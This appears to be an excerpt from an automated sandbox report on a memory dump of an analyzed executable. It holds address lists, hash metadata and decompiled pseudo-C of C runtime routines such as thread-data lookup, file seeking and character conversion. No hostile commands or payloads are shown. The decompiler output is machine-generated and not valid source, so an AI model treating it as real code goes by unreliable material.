                                                                                                              0x0040be5a
                                                                                                              0x0040be62
                                                                                                              0x0040be6a
                                                                                                              0x0040be6b
                                                                                                              0x0040be6c
                                                                                                              0x0040be6d
                                                                                                              0x0040be6e
                                                                                                              0x0040bcb9
                                                                                                              0x0040bcb9
                                                                                                              0x00000000
                                                                                                              0x0040bcbe
                                                                                                              0x0040bdf9
                                                                                                              0x0040bdfc
                                                                                                              0x0040bdff
                                                                                                              0x0040be04
                                                                                                              0x0040be05
                                                                                                              0x0040be05
                                                                                                              0x0040be05
                                                                                                              0x0040be08
                                                                                                              0x00000000
                                                                                                              0x0040be08
                                                                                                              0x0040bd7b
                                                                                                              0x0040bd7f
                                                                                                              0x0040bda0
                                                                                                              0x0040bda5
                                                                                                              0x0040bda7
                                                                                                              0x0040bda9
                                                                                                              0x0040bda9
                                                                                                              0x0040bd81
                                                                                                              0x0040bd88
                                                                                                              0x0040bd8a
                                                                                                              0x0040bd97
                                                                                                              0x0040bd97
                                                                                                              0x0040bd97
                                                                                                              0x0040bd9a
                                                                                                              0x0040bd8c
                                                                                                              0x0040bd8e
                                                                                                              0x0040bd91
                                                                                                              0x0040bd91
                                                                                                              0x0040bd9c
                                                                                                              0x0040bd9c
                                                                                                              0x0040bdab
                                                                                                              0x0040bdae
                                                                                                              0x00000000
                                                                                                              0x0040bdb4
                                                                                                              0x0040bdb4
                                                                                                              0x0040bdb5
                                                                                                              0x0040bdb9
                                                                                                              0x0040bdbe
                                                                                                              0x0040bdbf
                                                                                                              0x0040bdc0
                                                                                                              0x0040bdc5
                                                                                                              0x0040bdc8
                                                                                                              0x0040bdca
                                                                                                              0x0040be86
                                                                                                              0x00000000
                                                                                                              0x0040be86
                                                                                                              0x0040bdd0
                                                                                                              0x0040bdd3
                                                                                                              0x0040be74
                                                                                                              0x0040be74
                                                                                                              0x0040be74
                                                                                                              0x0040be74
                                                                                                              0x00000000
                                                                                                              0x0040be74
                                                                                                              0x0040bdd9
                                                                                                              0x0040bddc
                                                                                                              0x0040bdde
                                                                                                              0x00000000
                                                                                                              0x0040bdde
                                                                                                              0x0040bdae
                                                                                                              0x0040bd32
                                                                                                              0x0040bd35
                                                                                                              0x0040bd37
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x0040bd39
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x0040bd3f
                                                                                                              0x0040bd41
                                                                                                              0x0040bd43
                                                                                                              0x0040bd45
                                                                                                              0x0040bd45
                                                                                                              0x0040bd47
                                                                                                              0x0040bd4a
                                                                                                              0x0040be1b
                                                                                                              0x0040be1d
                                                                                                              0x0040be21
                                                                                                              0x0040be2a
                                                                                                              0x0040be2f
                                                                                                              0x0040be2f
                                                                                                              0x0040be32
                                                                                                              0x0040be37
                                                                                                              0x0040be38
                                                                                                              0x0040be39
                                                                                                              0x0040be3a
                                                                                                              0x0040be3b
                                                                                                              0x0040be41
                                                                                                              0x00000000
                                                                                                              0x0040bd50
                                                                                                              0x0040bd59
                                                                                                              0x0040bd5e
                                                                                                              0x0040bd61
                                                                                                              0x0040bd63
                                                                                                              0x0040bd66
                                                                                                              0x0040bd68
                                                                                                              0x0040bd6b
                                                                                                              0x0040bd6e
                                                                                                              0x0040bd6e
                                                                                                              0x0040be0b
                                                                                                              0x0040be0b
                                                                                                              0x0040be0b
                                                                                                              0x00000000
                                                                                                              0x0040bd29
                                                                                                              0x0040bd23
                                                                                                              0x0040bcee
                                                                                                              0x0040bccf
                                                                                                              0x0040bcd4
                                                                                                              0x0040bcd4
                                                                                                              0x0040bcd7
                                                                                                              0x0040bcda
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x0040bcda
                                                                                                              0x0040bca9
                                                                                                              0x0040bca9
                                                                                                              0x0040bcae
                                                                                                              0x0040bcaf
                                                                                                              0x0040bcb0
                                                                                                              0x0040bcb1
                                                                                                              0x0040bcb2
                                                                                                              0x0040bcb8
                                                                                                              0x00000000
                                                                                                              0x0040bcb8

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                                                              • String ID:
                                                                                                              • API String ID: 4048096073-0
                                                                                                              • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                              • Instruction ID: ac71b8413edd5c82999a863e1080af1727f4c3550edc762b5dddd404fb77a0c7
                                                                                                              • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                              • Instruction Fuzzy Hash: 3551E030900605EBDB219F6AC84499FBB74EF91324F24863BE825B22D1D7788E51CBDD
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 90%
                                                                                                              			E004146F8(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                              				signed int _t13;
                                                                                                              				intOrPtr _t28;
                                                                                                              				void* _t29;
                                                                                                              				void* _t30;
                                                                                                              
                                                                                                              				_t30 = __eflags;
                                                                                                              				_t26 = __edi;
                                                                                                              				_t25 = __edx;
                                                                                                              				_t22 = __ebx;
                                                                                                              				_push(0xc);
                                                                                                              				_push(0x4214d0);
                                                                                                              				E0040E198(__ebx, __edi, __esi);
                                                                                                              				_t28 = E004106F5(__ebx, __edx, __edi, _t30);
                                                                                                              				_t13 =  *0x422e34; // 0xfffffffe
                                                                                                              				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                                              					L6:
                                                                                                              					E0040D6A0(_t22, 0xc);
                                                                                                              					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                              					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                              					_t26 =  *0x422f18; // 0x422e40
                                                                                                              					 *((intOrPtr*)(_t29 - 0x1c)) = E004146BA(_t8, _t26);
                                                                                                              					 *(_t29 - 4) = 0xfffffffe;
                                                                                                              					E00414762();
                                                                                                              				} else {
                                                                                                              					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                              					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                              						goto L6;
                                                                                                              					} else {
                                                                                                              						_t28 =  *((intOrPtr*)(E004106F5(_t22, __edx, _t26, _t32) + 0x6c));
                                                                                                              					}
                                                                                                              				}
                                                                                                              				if(_t28 == 0) {
                                                                                                              					E0040E75A(_t25, _t26, 0x20);
                                                                                                              				}
                                                                                                              				return E0040E1DD(_t28);
                                                                                                              			}







                                                                                                              0x004146f8
                                                                                                              0x004146f8
                                                                                                              0x004146f8
                                                                                                              0x004146f8
                                                                                                              0x004146f8
                                                                                                              0x004146fa
                                                                                                              0x004146ff
                                                                                                              0x00414709
                                                                                                              0x0041470b
                                                                                                              0x00414713
                                                                                                              0x00414737
                                                                                                              0x00414739
                                                                                                              0x0041473f
                                                                                                              0x00414743
                                                                                                              0x00414746
                                                                                                              0x00414751
                                                                                                              0x00414754
                                                                                                              0x0041475b
                                                                                                              0x00414715
                                                                                                              0x00414715
                                                                                                              0x00414719
                                                                                                              0x00000000
                                                                                                              0x0041471b
                                                                                                              0x00414720
                                                                                                              0x00414720
                                                                                                              0x00414719
                                                                                                              0x00414725
                                                                                                              0x00414729
                                                                                                              0x0041472e
                                                                                                              0x00414736

                                                                                                              APIs
                                                                                                              • __getptd.LIBCMT ref: 00414704
                                                                                                                • Part of subcall function 004106F5: __getptd_noexit.LIBCMT ref: 004106F8
                                                                                                                • Part of subcall function 004106F5: __amsg_exit.LIBCMT ref: 00410705
                                                                                                              • __getptd.LIBCMT ref: 0041471B
                                                                                                              • __amsg_exit.LIBCMT ref: 00414729
                                                                                                              • __lock.LIBCMT ref: 00414739
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                              • String ID: @.B
                                                                                                              • API String ID: 3521780317-470711618
                                                                                                              • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                              • Instruction ID: 79052d33ef1135b751d7225a88192fb2588a7deb6a586739662bc9de74a94e56
                                                                                                              • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                              • Instruction Fuzzy Hash: D8F0BB31A40300DBD720BF769A0278D73A0AF82759F51452FE554673D1CB7C5C819B5D
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 65%
                                                                                                              			E004135D0() {
                                                                                                              				signed long long _v12;
                                                                                                              				signed int _v20;
                                                                                                              				signed long long _v28;
                                                                                                              				signed char _t8;
                                                                                                              
                                                                                                              				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                              				if(_t8 == 0) {
                                                                                                              					L6:
                                                                                                              					_v20 =  *0x41fb50;
                                                                                                              					_v28 =  *0x41fb48;
                                                                                                              					asm("fsubr qword [ebp-0x18]");
                                                                                                              					_v12 = _v28 / _v20 * _v20;
                                                                                                              					asm("fld1");
                                                                                                              					asm("fcomp qword [ebp-0x8]");
                                                                                                              					asm("fnstsw ax");
                                                                                                              					if((_t8 & 0x00000005) != 0) {
                                                                                                              						return 0;
                                                                                                              					} else {
                                                                                                              						return 1;
                                                                                                              					}
                                                                                                              				} else {
                                                                                                              					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                              					if(__eax == 0) {
                                                                                                              						goto L6;
                                                                                                              					} else {
                                                                                                              						_push(0);
                                                                                                              						return __eax;
                                                                                                              					}
                                                                                                              				}
                                                                                                              			}







                                                                                                              0x004135d5
                                                                                                              0x004135dd
                                                                                                              0x004135f4
                                                                                                              0x004135a0
                                                                                                              0x004135a9
                                                                                                              0x004135b5
                                                                                                              0x004135b8
                                                                                                              0x004135bb
                                                                                                              0x004135bd
                                                                                                              0x004135c0
                                                                                                              0x004135c5
                                                                                                              0x004135cf
                                                                                                              0x004135c7
                                                                                                              0x004135cb
                                                                                                              0x004135cb
                                                                                                              0x004135df
                                                                                                              0x004135e5
                                                                                                              0x004135ed
                                                                                                              0x00000000
                                                                                                              0x004135ef
                                                                                                              0x004135ef
                                                                                                              0x004135f3
                                                                                                              0x004135f3
                                                                                                              0x004135ed

                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32,0040CDB5), ref: 004135D5
                                                                                                              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004135E5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                              • API String ID: 1646373207-3105848591
                                                                                                              • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                              • Instruction ID: 4ed17461b18e8ad078d68ebb72b884049137bbd641d90a5a2387fd8933cf83de
                                                                                                              • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                              • Instruction Fuzzy Hash: C0F06230600A0AE2DB005FA1ED1E3EFBE79BB84B46F5101A19192B0094DF34D1B5825A
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 97%
                                                                                                              			E00405CB0(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
                                                                                                              				void* __edi;
                                                                                                              				void* __esi;
                                                                                                              				signed int _t30;
                                                                                                              				signed int _t31;
                                                                                                              				signed int _t32;
                                                                                                              				signed int _t33;
                                                                                                              				signed int _t35;
                                                                                                              				signed int _t39;
                                                                                                              				void* _t42;
                                                                                                              				intOrPtr _t43;
                                                                                                              				void* _t45;
                                                                                                              				signed int _t48;
                                                                                                              				signed int* _t53;
                                                                                                              				void* _t54;
                                                                                                              				void* _t55;
                                                                                                              				void* _t57;
                                                                                                              
                                                                                                              				_t54 = __ebp;
                                                                                                              				_t45 = __edx;
                                                                                                              				_t42 = __ebx;
                                                                                                              				_t53 = _a4;
                                                                                                              				if(_t53 == 0) {
                                                                                                              					L40:
                                                                                                              					_t31 = _t30 | 0xffffffff;
                                                                                                              					__eflags = _t31;
                                                                                                              					return _t31;
                                                                                                              				} else {
                                                                                                              					_t43 = _a12;
                                                                                                              					if(_t43 == 2) {
                                                                                                              						goto L40;
                                                                                                              					} else {
                                                                                                              						_t30 = _t53[0xe];
                                                                                                              						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
                                                                                                              							goto L40;
                                                                                                              						} else {
                                                                                                              							_t48 = _a8;
                                                                                                              							if(_t53[0x17] != 0x77) {
                                                                                                              								__eflags = _t43 - 1;
                                                                                                              								if(_t43 == 1) {
                                                                                                              									_t48 = _t48 + _t53[0x1a];
                                                                                                              									__eflags = _t48;
                                                                                                              								}
                                                                                                              								__eflags = _t48;
                                                                                                              								if(_t48 < 0) {
                                                                                                              									goto L39;
                                                                                                              								} else {
                                                                                                              									__eflags = _t53[0x16];
                                                                                                              									if(__eflags == 0) {
                                                                                                              										_t33 = _t53[0x1a];
                                                                                                              										__eflags = _t48 - _t33;
                                                                                                              										if(_t48 < _t33) {
                                                                                                              											_t30 = E004054A0(_t42, _t54, _t53);
                                                                                                              											_t55 = _t55 + 4;
                                                                                                              											__eflags = _t30;
                                                                                                              											if(_t30 < 0) {
                                                                                                              												goto L39;
                                                                                                              											} else {
                                                                                                              												goto L27;
                                                                                                              											}
                                                                                                              										} else {
                                                                                                              											_t48 = _t48 - _t33;
                                                                                                              											L27:
                                                                                                              											__eflags = _t48;
                                                                                                              											if(_t48 == 0) {
                                                                                                              												L38:
                                                                                                              												return _t53[0x1a];
                                                                                                              											} else {
                                                                                                              												__eflags = _t53[0x12];
                                                                                                              												if(_t53[0x12] != 0) {
                                                                                                              													L30:
                                                                                                              													__eflags = _t53[0x1b] - 0xffffffff;
                                                                                                              													if(_t53[0x1b] != 0xffffffff) {
                                                                                                              														_t53[0x1a] = _t53[0x1a] + 1;
                                                                                                              														_t48 = _t48 - 1;
                                                                                                              														__eflags = _t53[0x1c];
                                                                                                              														_t53[0x1b] = 0xffffffff;
                                                                                                              														if(_t53[0x1c] != 0) {
                                                                                                              															_t53[0xe] = 1;
                                                                                                              														}
                                                                                                              													}
                                                                                                              													__eflags = _t48;
                                                                                                              													if(_t48 <= 0) {
                                                                                                              														goto L38;
                                                                                                              													} else {
                                                                                                              														while(1) {
                                                                                                              															_t35 = 0x4000;
                                                                                                              															__eflags = _t48 - 0x4000;
                                                                                                              															if(_t48 < 0x4000) {
                                                                                                              																_t35 = _t48;
                                                                                                              															}
                                                                                                              															_t30 = E004059D0(_t45, _t53, _t53[0x12], _t35);
                                                                                                              															_t55 = _t55 + 0xc;
                                                                                                              															__eflags = _t30;
                                                                                                              															if(_t30 <= 0) {
                                                                                                              																goto L39;
                                                                                                              															}
                                                                                                              															_t48 = _t48 - _t30;
                                                                                                              															__eflags = _t48;
                                                                                                              															if(_t48 > 0) {
                                                                                                              																continue;
                                                                                                              															} else {
                                                                                                              																goto L38;
                                                                                                              															}
                                                                                                              															goto L41;
                                                                                                              														}
                                                                                                              														goto L39;
                                                                                                              													}
                                                                                                              												} else {
                                                                                                              													_t30 = E0040B80D(_t42, _t45, _t48, 0x4000);
                                                                                                              													_t55 = _t55 + 4;
                                                                                                              													_t53[0x12] = _t30;
                                                                                                              													__eflags = _t30;
                                                                                                              													if(_t30 == 0) {
                                                                                                              														goto L39;
                                                                                                              													} else {
                                                                                                              														goto L30;
                                                                                                              													}
                                                                                                              												}
                                                                                                              											}
                                                                                                              										}
                                                                                                              									} else {
                                                                                                              										_push(0);
                                                                                                              										_push(_t48);
                                                                                                              										_push(_t53[0x10]);
                                                                                                              										_t53[0x1b] = 0xffffffff;
                                                                                                              										_t53[1] = 0;
                                                                                                              										 *_t53 = _t53[0x11];
                                                                                                              										_t30 = E0040C42B(_t42, _t53[0x10], _t48, _t53, __eflags);
                                                                                                              										__eflags = _t30;
                                                                                                              										if(_t30 < 0) {
                                                                                                              											goto L39;
                                                                                                              										} else {
                                                                                                              											_t53[0x1a] = _t48;
                                                                                                              											_t53[0x19] = _t48;
                                                                                                              											return _t48;
                                                                                                              										}
                                                                                                              									}
                                                                                                              								}
                                                                                                              							} else {
                                                                                                              								if(_t43 == 0) {
                                                                                                              									_t48 = _t48 - _t53[0x19];
                                                                                                              								}
                                                                                                              								if(_t48 < 0) {
                                                                                                              									L39:
                                                                                                              									_t32 = _t30 | 0xffffffff;
                                                                                                              									__eflags = _t32;
                                                                                                              									return _t32;
                                                                                                              								} else {
                                                                                                              									if(_t53[0x11] != 0) {
                                                                                                              										L11:
                                                                                                              										if(_t48 <= 0) {
                                                                                                              											L17:
                                                                                                              											return _t53[0x19];
                                                                                                              										} else {
                                                                                                              											while(1) {
                                                                                                              												_t39 = 0x4000;
                                                                                                              												if(_t48 < 0x4000) {
                                                                                                              													_t39 = _t48;
                                                                                                              												}
                                                                                                              												_t30 = E00405210(_t42, _t45, _t53, _t53[0x11], _t39);
                                                                                                              												_t55 = _t55 + 0xc;
                                                                                                              												if(_t30 == 0) {
                                                                                                              													goto L39;
                                                                                                              												}
                                                                                                              												_t48 = _t48 - _t30;
                                                                                                              												if(_t48 > 0) {
                                                                                                              													continue;
                                                                                                              												} else {
                                                                                                              													goto L17;
                                                                                                              												}
                                                                                                              												goto L41;
                                                                                                              											}
                                                                                                              											goto L39;
                                                                                                              										}
                                                                                                              									} else {
                                                                                                              										_t30 = E0040B80D(_t42, _t45, _t48, 0x4000);
                                                                                                              										_t57 = _t55 + 4;
                                                                                                              										_t53[0x11] = _t30;
                                                                                                              										if(_t30 == 0) {
                                                                                                              											goto L39;
                                                                                                              										} else {
                                                                                                              											E0040B9F0(_t48, _t30, 0, 0x4000);
                                                                                                              											_t55 = _t57 + 0xc;
                                                                                                              											goto L11;
                                                                                                              										}
                                                                                                              									}
                                                                                                              								}
                                                                                                              							}
                                                                                                              						}
                                                                                                              					}
                                                                                                              				}
                                                                                                              				L41:
                                                                                                              			}



















                                                                                                              0x00405cb0
                                                                                                              0x00405cb0
                                                                                                              0x00405cb0
                                                                                                              0x00405cb1
                                                                                                              0x00405cb7
                                                                                                              0x00405e2f
                                                                                                              0x00405e2f
                                                                                                              0x00405e2f
                                                                                                              0x00405e33
                                                                                                              0x00405cbd
                                                                                                              0x00405cbd
                                                                                                              0x00405cc4
                                                                                                              0x00000000
                                                                                                              0x00405cca
                                                                                                              0x00405cca
                                                                                                              0x00405cd0
                                                                                                              0x00000000
                                                                                                              0x00405cdf
                                                                                                              0x00405ce4
                                                                                                              0x00405ce8
                                                                                                              0x00405d5d
                                                                                                              0x00405d60
                                                                                                              0x00405d62
                                                                                                              0x00405d62
                                                                                                              0x00405d62
                                                                                                              0x00405d65
                                                                                                              0x00405d67
                                                                                                              0x00000000
                                                                                                              0x00405d6d
                                                                                                              0x00405d6d
                                                                                                              0x00405d71
                                                                                                              0x00405da8
                                                                                                              0x00405dab
                                                                                                              0x00405dad
                                                                                                              0x00405db4
                                                                                                              0x00405db9
                                                                                                              0x00405dbc
                                                                                                              0x00405dbe
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00405daf
                                                                                                              0x00405daf
                                                                                                              0x00405dc0
                                                                                                              0x00405dc0
                                                                                                              0x00405dc2
                                                                                                              0x00405e23
                                                                                                              0x00405e28
                                                                                                              0x00405dc4
                                                                                                              0x00405dc4
                                                                                                              0x00405dc8
                                                                                                              0x00405dde
                                                                                                              0x00405dde
                                                                                                              0x00405de2
                                                                                                              0x00405de4
                                                                                                              0x00405de7
                                                                                                              0x00405de8
                                                                                                              0x00405dec
                                                                                                              0x00405df3
                                                                                                              0x00405df5
                                                                                                              0x00405df5
                                                                                                              0x00405df3
                                                                                                              0x00405dfc
                                                                                                              0x00405dfe
                                                                                                              0x00000000
                                                                                                              0x00405e00
                                                                                                              0x00405e00
                                                                                                              0x00405e00
                                                                                                              0x00405e05
                                                                                                              0x00405e07
                                                                                                              0x00405e09
                                                                                                              0x00405e09
                                                                                                              0x00405e11
                                                                                                              0x00405e16
                                                                                                              0x00405e19
                                                                                                              0x00405e1b
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00405e1d
                                                                                                              0x00405e1f
                                                                                                              0x00405e21
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00405e21
                                                                                                              0x00000000
                                                                                                              0x00405e00
                                                                                                              0x00405dca
                                                                                                              0x00405dcf
                                                                                                              0x00405dd4
                                                                                                              0x00405dd7
                                                                                                              0x00405dda
                                                                                                              0x00405ddc
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00405ddc
                                                                                                              0x00405dc8
                                                                                                              0x00405dc2
                                                                                                              0x00405d73
                                                                                                              0x00405d79
                                                                                                              0x00405d7b
                                                                                                              0x00405d7c
                                                                                                              0x00405d7d
                                                                                                              0x00405d84
                                                                                                              0x00405d8b
                                                                                                              0x00405d8d
                                                                                                              0x00405d95
                                                                                                              0x00405d97
                                                                                                              0x00000000
                                                                                                              0x00405d9d
                                                                                                              0x00405d9d
                                                                                                              0x00405da0
                                                                                                              0x00405da7
                                                                                                              0x00405da7
                                                                                                              0x00405d97
                                                                                                              0x00405d71
                                                                                                              0x00405cea
                                                                                                              0x00405cec
                                                                                                              0x00405cee
                                                                                                              0x00405cee
                                                                                                              0x00405cf3
                                                                                                              0x00405e29
                                                                                                              0x00405e2a
                                                                                                              0x00405e2a
                                                                                                              0x00405e2e
                                                                                                              0x00405cf9
                                                                                                              0x00405cfd
                                                                                                              0x00405d27
                                                                                                              0x00405d29
                                                                                                              0x00405d57
                                                                                                              0x00405d5c
                                                                                                              0x00405d2b
                                                                                                              0x00405d30
                                                                                                              0x00405d30
                                                                                                              0x00405d37
                                                                                                              0x00405d39
                                                                                                              0x00405d39
                                                                                                              0x00405d41
                                                                                                              0x00405d46
                                                                                                              0x00405d4b
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00405d51
                                                                                                              0x00405d55
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00405d55
                                                                                                              0x00000000
                                                                                                              0x00405d30
                                                                                                              0x00405cff
                                                                                                              0x00405d04
                                                                                                              0x00405d09
                                                                                                              0x00405d0c
                                                                                                              0x00405d11
                                                                                                              0x00000000
                                                                                                              0x00405d17
                                                                                                              0x00405d1f
                                                                                                              0x00405d24
                                                                                                              0x00000000
                                                                                                              0x00405d24
                                                                                                              0x00405d11
                                                                                                              0x00405cfd
                                                                                                              0x00405cf3
                                                                                                              0x00405ce8
                                                                                                              0x00405cd0
                                                                                                              0x00405cc4
                                                                                                              0x00000000

                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: _fseek_malloc_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 208892515-0
                                                                                                              • Opcode ID: f8e7edbf3f90f31ef8fb9ed918db1b5b7717394cce6efc79da1edb831684deec
                                                                                                              • Instruction ID: fb1dde6b94970b1238faede9759046b2f1ea0db44af508fad206ce6175512b40
                                                                                                              • Opcode Fuzzy Hash: f8e7edbf3f90f31ef8fb9ed918db1b5b7717394cce6efc79da1edb831684deec
                                                                                                              • Instruction Fuzzy Hash: C341A572600F014AD7309A2EE80571772E5DF80324F140A3FE5D6E27D5E738E9858F99
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 100%
                                                                                                              			E0041525F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                              				char _v8;
                                                                                                              				signed int _v12;
                                                                                                              				char _v20;
                                                                                                              				char _t43;
                                                                                                              				char _t46;
                                                                                                              				signed int _t53;
                                                                                                              				signed int _t54;
                                                                                                              				intOrPtr _t56;
                                                                                                              				int _t57;
                                                                                                              				int _t58;
                                                                                                              				signed short* _t59;
                                                                                                              				short* _t60;
                                                                                                              				int _t65;
                                                                                                              				char* _t72;
                                                                                                              
                                                                                                              				_t72 = _a8;
                                                                                                              				if(_t72 == 0 || _a12 == 0) {
                                                                                                              					L5:
                                                                                                              					return 0;
                                                                                                              				} else {
                                                                                                              					if( *_t72 != 0) {
                                                                                                              						E0040EC46( &_v20, _a16);
                                                                                                              						_t43 = _v20;
                                                                                                              						__eflags =  *(_t43 + 0x14);
                                                                                                              						if( *(_t43 + 0x14) != 0) {
                                                                                                              							_t46 = E00415390( *_t72 & 0x000000ff,  &_v20);
                                                                                                              							__eflags = _t46;
                                                                                                              							if(_t46 == 0) {
                                                                                                              								__eflags = _a4;
                                                                                                              								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                              								if(__eflags != 0) {
                                                                                                              									L10:
                                                                                                              									__eflags = _v8;
                                                                                                              									if(_v8 != 0) {
                                                                                                              										_t53 = _v12;
                                                                                                              										_t11 = _t53 + 0x70;
                                                                                                              										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                              										__eflags =  *_t11;
                                                                                                              									}
                                                                                                              									return 1;
                                                                                                              								}
                                                                                                              								L21:
                                                                                                              								_t54 = E0040BF81(__eflags);
                                                                                                              								 *_t54 = 0x2a;
                                                                                                              								__eflags = _v8;
                                                                                                              								if(_v8 != 0) {
                                                                                                              									_t54 = _v12;
                                                                                                              									_t33 = _t54 + 0x70;
                                                                                                              									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                              									__eflags =  *_t33;
                                                                                                              								}
                                                                                                              								return _t54 | 0xffffffff;
                                                                                                              							}
                                                                                                              							_t56 = _v20;
                                                                                                              							_t65 =  *(_t56 + 0xac);
                                                                                                              							__eflags = _t65 - 1;
                                                                                                              							if(_t65 <= 1) {
                                                                                                              								L17:
                                                                                                              								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                                              								if(__eflags < 0) {
                                                                                                              									goto L21;
                                                                                                              								}
                                                                                                              								__eflags = _t72[1];
                                                                                                              								if(__eflags == 0) {
                                                                                                              									goto L21;
                                                                                                              								}
                                                                                                              								L19:
                                                                                                              								_t57 =  *(_t56 + 0xac);
                                                                                                              								__eflags = _v8;
                                                                                                              								if(_v8 == 0) {
                                                                                                              									return _t57;
                                                                                                              								}
                                                                                                              								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                              								return _t57;
                                                                                                              							}
                                                                                                              							__eflags = _a12 - _t65;
                                                                                                              							if(_a12 < _t65) {
                                                                                                              								goto L17;
                                                                                                              							}
                                                                                                              							__eflags = _a4;
                                                                                                              							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                              							__eflags = _t58;
                                                                                                              							_t56 = _v20;
                                                                                                              							if(_t58 != 0) {
                                                                                                              								goto L19;
                                                                                                              							}
                                                                                                              							goto L17;
                                                                                                              						}
                                                                                                              						_t59 = _a4;
                                                                                                              						__eflags = _t59;
                                                                                                              						if(_t59 != 0) {
                                                                                                              							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                              						}
                                                                                                              						goto L10;
                                                                                                              					} else {
                                                                                                              						_t60 = _a4;
                                                                                                              						if(_t60 != 0) {
                                                                                                              							 *_t60 = 0;
                                                                                                              						}
                                                                                                              						goto L5;
                                                                                                              					}
                                                                                                              				}
                                                                                                              			}

















                                                                                                              0x00415269
                                                                                                              0x00415270
                                                                                                              0x00415287
                                                                                                              0x00000000
                                                                                                              0x00415277
                                                                                                              0x00415279
                                                                                                              0x00415293
                                                                                                              0x00415298
                                                                                                              0x0041529b
                                                                                                              0x0041529e
                                                                                                              0x004152c7
                                                                                                              0x004152ce
                                                                                                              0x004152d0
                                                                                                              0x00415351
                                                                                                              0x0041536c
                                                                                                              0x0041536e
                                                                                                              0x004152ae
                                                                                                              0x004152ae
                                                                                                              0x004152b1
                                                                                                              0x004152b3
                                                                                                              0x004152b6
                                                                                                              0x004152b6
                                                                                                              0x004152b6
                                                                                                              0x004152b6
                                                                                                              0x00000000
                                                                                                              0x004152bc
                                                                                                              0x00415330
                                                                                                              0x00415330
                                                                                                              0x00415335
                                                                                                              0x0041533b
                                                                                                              0x0041533e
                                                                                                              0x00415340
                                                                                                              0x00415343
                                                                                                              0x00415343
                                                                                                              0x00415343
                                                                                                              0x00415343
